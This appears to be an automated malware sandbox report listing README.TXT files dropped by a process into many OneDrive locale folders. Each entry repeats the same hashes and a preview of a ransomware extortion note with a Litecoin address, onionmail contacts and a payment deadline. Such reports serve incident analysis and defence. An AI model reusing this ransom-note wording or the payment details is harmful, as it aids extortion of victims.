                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\bg\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\bn-IN\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\bs-Latn-BA\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\ca-Es-VALENCIA\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\ca\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\cs\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\cy-GB\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\da\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\de\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\el\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\en-GB\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\en-US\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\en\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\et\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\eu\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
